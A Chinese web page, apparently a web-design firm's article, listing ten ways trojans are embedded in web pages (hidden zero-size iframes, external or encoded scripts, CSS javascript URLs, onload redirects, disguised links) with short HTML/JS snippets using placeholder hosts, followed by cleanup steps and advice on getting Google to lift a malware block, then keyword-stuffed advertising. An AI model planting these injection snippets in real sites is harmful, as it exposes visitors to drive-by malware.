木馬的存在形態(tài)有如下幾種:
一:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
三:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后綴
四:body掛馬
<body onload="window.location='地址';"></body>
五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="'">http://www.xxxxxxxxxxxxxx"></iframe>'; 注意:此網(wǎng)址為虛擬,僅為說明木馬情況。
六:css中掛馬
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
七:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:圖片偽裝
<html>
<iframe src="網(wǎng)馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
九:偽裝調(diào)用:
<frameset rows="444,0" cols="*">
<frame src="打開網(wǎng)頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網(wǎng)馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高級(jí)欺騙
<a href="http://www.86807888.com.cn(迷惑連接地址,顯示這個(gè)地址指向木馬地址)" onMouseOver="www_szweb_cn(); return true;"> 頁面要顯示的內(nèi)容 </a>
<SCRIPT Language="JavaScript">
function www_szweb_cn()
{
var url="網(wǎng)馬地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,
status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
清除木馬的具體操作步驟如下:
1)清除網(wǎng)頁中的木馬
刪除現(xiàn)有的網(wǎng)頁中的木馬,主要有這樣類似的代碼:
<iframe…或者 …xxx.js></script>
出現(xiàn)上面這些特征的代碼,如果里面包含的網(wǎng)址不是自己網(wǎng)站的,那基本上就是中了木馬了。我們比較常見的木馬是<iframe,對(duì)網(wǎng)站頁以及其它主要頁面的源代碼進(jìn)行檢查,用記事本打開這些頁面后,以“<iframe”為關(guān)鍵字進(jìn)行搜索,找到后可以查看是否是掛馬代碼。不過碰上有經(jīng)驗(yàn)的黑客,會(huì)編寫一段代碼將整句掛馬代碼進(jìn)行加密,這樣我們就很難找到網(wǎng)頁中的掛馬代碼。這時(shí)可以將所有網(wǎng)頁文件按修改時(shí)間進(jìn)行排序,如果有個(gè)別網(wǎng)頁被修改,我們可以很快地發(fā)現(xiàn)。
2)刺激google快速更新
木馬被清除了,google上還是被屏蔽著。這時(shí)就想辦法讓google爬蟲重新檢索網(wǎng)站,更新檢索結(jié)果。這樣,網(wǎng)站的屏蔽才能被解除。刺激google更新的的手段有如下一些:
1)持續(xù)更新網(wǎng)站頁的文章;
2)重新給google提交網(wǎng)站地圖;
3)為網(wǎng)站去找一些高質(zhì)量的外鏈;
4)申請(qǐng)審核。當(dāng)網(wǎng)站有病毒后,在google網(wǎng)站管理員工具內(nèi)的“診斷”頁面會(huì)有一個(gè)提示,就是說網(wǎng)站含有惡意代碼,然后會(huì)提示你可以“申請(qǐng)審核”填寫相關(guān)信息提交。
網(wǎng)頁設(shè)計(jì)
企業(yè)網(wǎng)站建設(shè)一條龍
找零度飛易網(wǎng)絡(luò)公司-fslingdu所做php
網(wǎng)站建設(shè)方案、
網(wǎng)站設(shè)計(jì)、
網(wǎng)站制作由
北京上海深圳龍崗衢州蘭州常州東營南通濟(jì)寧桂林淮安煙臺(tái)長春無錫天津昆山蘇州合肥貴洛陽昆明天津唐山泉州惠州萬州新鄉(xiāng)商丘臺(tái)州哈爾濱太原攝影海口隨州學(xué)校商丘廣東湖南廣西江西海南廣州企業(yè)中小企業(yè)武漢南山羅湖福田虎門肇慶汕尾汕頭廣州佛山成都杭州濟(jì)南重慶福州西安廈門昆山沈陽青島徐州鄭州南京寧南寧長沙大連淄博石家莊南昌溫州珠海番禺順德南三水高明中山東莞合肥江門嘉興西寧大良容桂倫教勒流陳村均安杏壇龍江樂從北滘祖廟石灣南莊等地區(qū)
企業(yè)網(wǎng)站建設(shè)(廣告)公司提供專業(yè)做網(wǎng)站價(jià)格規(guī)劃書及
營銷型網(wǎng)站制作,
網(wǎng)站建設(shè)基礎(chǔ)知識(shí)